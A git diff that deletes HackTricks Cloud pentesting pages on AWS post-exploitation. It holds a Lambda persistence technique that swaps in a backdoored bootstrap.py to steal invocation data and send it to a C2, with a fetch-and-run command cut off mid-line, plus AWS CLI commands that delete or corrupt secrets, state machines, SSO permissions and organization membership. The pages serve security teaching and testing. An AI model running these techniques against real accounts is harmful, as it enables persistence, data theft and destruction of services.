-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md deleted file mode 100644 index 94ea21684..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md +++ /dev/null @@ -1,89 +0,0 @@ -# AWS - Steal Lambda Requests - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Lambda Flow - -

https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/lambda_poc_2_arch.png

- -1. **Slicer** is a process outside the container that **send** **invocations** to the **init** process. -2. The init process listens on port **9001** exposing some interesting endpoints: - * **`/2018-06-01/runtime/invocation/next`** – get the next invocation event - * **`/2018-06-01/runtime/invocation/{invoke-id}/response`** – return the handler response for the invoke - * **`/2018-06-01/runtime/invocation/{invoke-id}/error`** – return an execution error -3. **bootstrap.py** has a loop getting invocations from the init process and calls the users code to handle them (**`/next`**). -4. Finally, **bootstrap.py** sends to init the **response** - -Note that bootstrap loads the user code as a module, so any code execution performed by the users code is actually happening in this process. - -## Stealing Lambda Requests - -The goal of this attack is to make the users code execute a malicious **`bootstrap.py`** process inside the **`bootstrap.py`** process that handle the vulnerable request. This way, the **malicious bootstrap** process will start **talking with the init process** to handle the requests while the **legit** bootstrap is **trapped** running the malicious one, so it won't ask for requests to the init process. - -This is a simple task to achieve as the code of the user is being executed by the legit **`bootstrap.py`** process. So the attacker could: - -* **Send a fake result of the current invocation to the init process**, so init thinks the bootstrap process is waiting for more invocations. - * A request must be sent to **`/${invoke-id}/response`** - * The invoke-id can be obtained from the stack of the legit **`bootstrap.py`** process using the [**inspect**](https://docs.python.org/3/library/inspect.html) python module (as [proposed here](https://github.com/twistlock/lambda-persistency-poc/blob/master/poc/switch_runtime.py)) or just requesting it again to **`/2018-06-01/runtime/invocation/next`** (as [proposed here](https://github.com/Djkusik/serverless_persistency_poc/blob/master/gcp/exploit_files/switcher.py)). -* Execute a malicious **`boostrap.py`** which will handle the next invocations - * For stealthiness purposes it's possible to send the lambda invocations parameters to an attackers controlled C2 and then handle the requests as usual. - * For this attack, it's enough to get the original code of **`bootstrap.py`** from the system or [**github**](https://github.com/aws/aws-lambda-python-runtime-interface-client/blob/main/awslambdaric/bootstrap.py), add the malicious code and run it from the current lambda invocation. - -### Attack Steps - -1. Find a **RCE** vulnerability. -2. Generate a **malicious** **bootstrap** (e.g. [https://raw.githubusercontent.com/carlospolop/lambda\_bootstrap\_switcher/main/backdoored\_bootstrap.py](https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py)) -3. **Execute** the malicious bootstrap. - -You can easily perform these actions running: - -```bash -python3 <[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md deleted file mode 100644 index db17d6d72..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md +++ /dev/null @@ -1,56 +0,0 @@ -# AWS - Lightsail Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Lightsail - -For more information, check: - -{% content-ref url="../aws-services/aws-lightsail-enum.md" %} -[aws-lightsail-enum.md](../aws-services/aws-lightsail-enum.md) -{% endcontent-ref %} - -### Restore old DB snapshots - -If the DB is having snapshots, you might be able to **find sensitive information currently deleted in old snapshots**. **Restore** the snapshot in a **new database** and check it. - -### Restore Instance Snapshots - -Instance snapshots might contain **sensitive information** of already deleted instances or sensitive info that is deleted in the current instance. **Create new instances from the snapshots** and check them.\ -Or **export the snapshot to an AMI in EC2** and follow the steps of a typical EC2 instance. - -### Access Sensitive Information - -Check out the Lightsail privesc options to learn different ways to access potential sensitive information: - -{% content-ref url="../aws-privilege-escalation/aws-lightsail-privesc.md" %} -[aws-lightsail-privesc.md](../aws-privilege-escalation/aws-lightsail-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md deleted file mode 100644 index 9bd9c70bb..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md +++ /dev/null @@ -1,47 +0,0 @@ -# AWS - Organizations Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Organizations - -For more info about AWS Organizations check: - -{% content-ref url="../aws-services/aws-organizations-enum.md" %} -[aws-organizations-enum.md](../aws-services/aws-organizations-enum.md) -{% endcontent-ref %} - -### Leave the Org - -{% code overflow="wrap" %} -```bash -aws organizations deregister-account --account-id --region -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md deleted file mode 100644 index cc0591b88..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md +++ /dev/null @@ -1,76 +0,0 @@ -# AWS - Secrets Manager Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Secrets Manager - -For more information check: - -{% content-ref url="../aws-services/aws-secrets-manager-enum.md" %} -[aws-secrets-manager-enum.md](../aws-services/aws-secrets-manager-enum.md) -{% endcontent-ref %} - -### Read Secrets - -The **secrets themself are sensitive information**, [check the privesc page](../aws-privilege-escalation/aws-secrets-manager-privesc.md) to learn how to read them. - -### DoS Change Secret Value - -Changing the value of the secret you could **DoS all the system that depends on that value.** - -{% hint style="warning" %} -Note that previous values are also stored, so it's easy to just go back to the previous value. -{% endhint %} - -```bash -# Requires permission secretsmanager:PutSecretValue -aws secretsmanager put-secret-value \ - --secret-id MyTestSecret \ - --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}" -``` - -### DoS Change KMS key - -```bash -aws secretsmanager update-secret \ - --secret-id MyTestSecret \ - --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE -``` - -### DoS Deleting Secret - -The minimum number of days to delete a secret are 7 - -```bash -aws secretsmanager delete-secret \ - --secret-id MyTestSecret \ - --recovery-window-in-days 7 -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md deleted file mode 100644 index 6e41ef586..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md +++ /dev/null @@ -1,117 +0,0 @@ -# AWS - SES Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SES - -For more information check: - -{% content-ref url="../aws-services/aws-ses-enum.md" %} -[aws-ses-enum.md](../aws-services/aws-ses-enum.md) -{% endcontent-ref %} - -### `ses:SendEmail` - -Send an email. - -{% code overflow="wrap" %} -```bash -aws ses send-email --from sender@example.com --destination file://emails.json --message file://message.json -aws sesv2 send-email --from sender@example.com --destination file://emails.json --message file://message.json -``` -{% endcode %} - -Still to test. - -### `ses:SendRawEmail` - -Send an email. - -```bash -aws ses send-raw-email --raw-message file://message.json -``` - -Still to test. - -### `ses:SendTemplatedEmail` - -Send an email based on a template. - -{% code overflow="wrap" %} -```bash -aws ses send-templated-email --source --destination --template -``` -{% endcode %} - -Still to test. - -### `ses:SendBulkTemplatedEmail` - -Send an email to multiple destinations - -```bash -aws ses send-bulk-templated-email --source --template -``` - -Still to test. - -### `ses:SendBulkEmail` - -Send an email to multiple destinations. - -``` -aws sesv2 send-bulk-email --default-content --bulk-email-entries -``` - -### `ses:SendBounce` - -Send a **bounce email** over a received email (indicating that the email couldn't be received). This can only be done **up to 24h after receiving** the email. - -{% code overflow="wrap" %} -```bash -aws ses send-bounce --original-message-id --bounce-sender --bounced-recipient-info-list -``` -{% endcode %} - -Still to test. - -### `ses:SendCustomVerificationEmail` - -This will send a customized verification email. You might need permissions also to created the template email. - -{% code overflow="wrap" %} -```bash -aws ses send-custom-verification-email --email-address --template-name -aws sesv2 send-custom-verification-email --email-address --template-name -``` -{% endcode %} - -Still to test. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md deleted file mode 100644 index ccffb5ede..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md +++ /dev/null @@ -1,53 +0,0 @@ -# AWS - SSO & identitystore Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SSO & identitystore - -For more information check: - -{% content-ref url="../aws-services/aws-iam-enum.md" %} -[aws-iam-enum.md](../aws-services/aws-iam-enum.md) -{% endcontent-ref %} - -### `sso:DeletePermissionSet` | `sso:PutPermissionsBoundaryToPermissionSet` | `sso:DeleteAccountAssignment` - -These permissions can be used to disrupt permissions: - -{% code overflow="wrap" %} -```bash -aws sso-admin delete-permission-set --instance-arn --permission-set-arn - -aws sso-admin put-permissions-boundary-to-permission-set --instance-arn --permission-set-arn --permissions-boundary-policy-arn - -aws sso-admin delete-account-assignment --instance-arn --target-id --target-type --permission-set-arn --principal-type --principal-id -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md deleted file mode 100644 index 67719fd73..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md +++ /dev/null @@ -1,105 +0,0 @@ -# AWS - Step Functions Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Step Functions - -For more information about this AWS service, check: - -{% content-ref url="../aws-services/aws-stepfunctions-enum.md" %} -[aws-stepfunctions-enum.md](../aws-services/aws-stepfunctions-enum.md) -{% endcontent-ref %} - -### `states:RevealSecrets` - -This permission allows to **reveal secret data inside an execution**. For it, it's needed to set Inspection level to TRACE and the revealSecrets parameter to true. - -
- -### `states:DeleteStateMachine`, `states:DeleteStateMachineVersion`, `states:DeleteStateMachineAlias` - -An attacker with these permissions would be able to permanently delete state machines, their versions, and aliases. This can disrupt critical workflows, result in data loss, and require significant time to recover and restore the affected state machines. In addition, it would allow an attacker to cover the tracks used, disrupt forensic investigations, and potentially cripple operations by removing essential automation processes and state configurations. - -{% hint style="info" %} -* Deleting a state machine you also delete all its associated versions and aliases. -* Deleting a state machine alias you do not delete the state machine versions referecing this alias. -* It is not possible to delete a state machine version currently referenced by one o more aliases. -{% endhint %} - -```bash -# Delete state machine -aws stepfunctions delete-state-machine --state-machine-arn -# Delete state machine version -aws stepfunctions delete-state-machine-version --state-machine-version-arn -# Delete state machine alias -aws stepfunctions delete-state-machine-alias --state-machine-alias-arn -``` - -* **Potential Impact**: Disruption of critical workflows, data loss, and operational downtime. - -### `states:UpdateMapRun` - -An attacker with this permission would be able to manipulate the Map Run failure configuration and parallel setting, being able to increase or decrease the maximum number of child workflow executions allowed, affecting directly and performance of the service. In addition, an attacker could tamper with the tolerated failure percentage and count, being able to decrease this value to 0 so every time an item fails, the whole map run would fail, affecting directly to the state machine execution and potentially disrupting critical workflows. - -{% code overflow="wrap" %} -```bash -aws stepfunctions update-map-run --map-run-arn [--max-concurrency ] [--tolerated-failure-percentage ] [--tolerated-failure-count ] -``` -{% endcode %} - -* **Potential Impact**: Performance degradation, and disruption of critical workflows. - -### `states:StopExecution` - -An attacker with this permission could be able to stop the execution of any state machine, disrupting ongoing workflows and processes. This could lead to incomplete transactions, halted business operations, and potential data corruption. - -{% hint style="warning" %} -This action is not supported by **express state machines**. -{% endhint %} - -{% code overflow="wrap" %} -```bash -aws stepfunctions stop-execution --execution-arn [--error ] [--cause ] -``` -{% endcode %} - -* **Potential Impact**: Disruption of ongoing workflows, operational downtime, and potential data corruption. - -### `states:TagResource`, `states:UntagResource` - -An attacker could add, modify, or remove tags from Step Functions resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. - -```bash -aws stepfunctions tag-resource --resource-arn --tags Key=,Value= -aws stepfunctions untag-resource --resource-arn --tag-keys -``` - -**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md deleted file mode 100644 index 4ca191307..000000000 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md +++ /dev/null @@ -1,39 +0,0 @@ -# AWS - VPN Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## VPN - -For more information: - -{% content-ref url="../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %} -[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/README.md b/pentesting-cloud/aws-security/aws-privilege-escalation/README.md deleted file mode 100644 index 5d96ec8ca..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/README.md +++ /dev/null @@ -1,51 +0,0 @@ -# AWS - Privilege Escalation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## AWS Privilege Escalation - -The way to escalate your privileges in AWS is to have enough permissions to be able to, somehow, access other roles/users/groups privileges. Chaining escalations until you have admin access over the organization. - -{% hint style="warning" %} -AWS has **hundreds** (if not thousands) of **permissions** that an entity can be granted. In this book you can find **all the permissions that I know** that you can abuse to **escalate privileges**, but if you **know some path** not mentioned here, **please share it**. -{% endhint %} - -{% hint style="danger" %} -If an IAM policy has `"Effect": "Allow"` and `"NotAction": "Someaction"` indicating a **resource**... that means that the **allowed principal** has **permission to do ANYTHING but that specified action**.\ -So remember that this is another way to **grant privileged permissions** to a principal. -{% endhint %} - -**The pages of this section are ordered by AWS service. In there you will be able to find permissions that will allow you to escalate privileges.** - -## Tools - -* [https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws\_escalate.py](https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.py) -* [Pacu](https://github.com/RhinoSecurityLabs/pacu) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md deleted file mode 100644 index 7294ee888..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md +++ /dev/null @@ -1,35 +0,0 @@ -# AWS - Chime Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### chime:CreateApiKey - -TODO - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
